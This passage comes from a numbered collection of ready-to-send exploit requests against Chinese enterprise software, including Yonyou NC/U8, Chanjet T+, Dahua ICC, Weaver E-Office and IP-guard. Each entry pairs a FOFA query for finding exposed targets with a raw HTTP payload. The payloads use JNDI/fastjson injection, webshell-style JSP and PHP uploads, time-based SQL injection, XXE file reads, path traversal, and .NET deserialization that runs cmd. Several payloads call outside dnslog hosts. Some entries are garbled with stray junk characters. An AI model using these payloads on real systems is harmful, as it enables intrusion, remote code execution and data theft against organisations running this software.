Replace dnslog with a DNS-log host you control; a lookup from the target shows the JNDI expression is being evaluated.
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same request as item 21; DNSLOG is a placeholder for your DNS-log host, and the malformed JSON is intentional.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The uploaded part is declared as a .txt file of type text/plain, but its body is JSP, and the separate fname field sets the final location and extension under webapps\nc_web. Requesting the resulting .jsp and getting 2XpU7Y2Els1K9wZvOlSmrgolNci back confirms execution.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

! g" @" D+ Y2 u; w: G. v+ g( Y8 K31. 用友NC runStateServlet SQL注入
' s  l. u6 y! v5 X1 oversion<=6.5$ h& k- q1 o" X" P* d4 O+ p+ j7 b
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* l& e4 j. X; e+ j1 Z  `7 Z
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.18 E; X. u5 u! \! w' D* T
Host: host$ `# X5 x: c& r3 Q# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- S% u( m; O1 {Content-Type: application/x-www-form-urlencoded
6 i  B7 X" k& }( Y6 P# x" {7 c# j: c3 P3 W4 C3 P

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

& ^" C$ o( O! f: \0 [5 q9 a56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
$ p( ?7 v, b" g' \) c: TFOFA: app="畅捷通-TPlus"/ Y% A7 m: E  N; F* @2 A( L8 q! n
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 L8 q: v- q4 R9 I6 D, P2 WHost: x.x.x.x
6 D* o& A: K/ X" zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( B( F  Q- u% H" H; ?4 a: hContent-Type: application/json
( B' O( o/ h: \) ?! V$ P1 S" n" e% h
{7 @* p- j7 _9 i2 b
  "storeID":{0 r/ ^- R1 \: w7 j' ^, e' c) O
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
, J9 _# R! a$ x, i4 y  Z% W   "MethodName":"Start",: K/ i, |4 Y5 q. C$ u1 p
    "ObjectInstance":{
; I1 g2 e  |% p7 G- B! c: A       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 S5 ?4 Z& X1 i3 K# I4 m
        "StartInfo": {# q5 Q* ^8 {  D7 P6 L0 J) t) {; s
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 n$ G* q9 I) U# Z! Q           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"$ t5 T& J9 U5 C
       }
4 P% C) a1 O' i% C+ E* R* O0 D) G    }- C( `8 _" @' ]3 R9 Q! y
  }
+ n( a: X  r: i* J" p$ J1 k}( K7 C6 G' Z3 d
, }, I3 j" F: ]) a* q

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
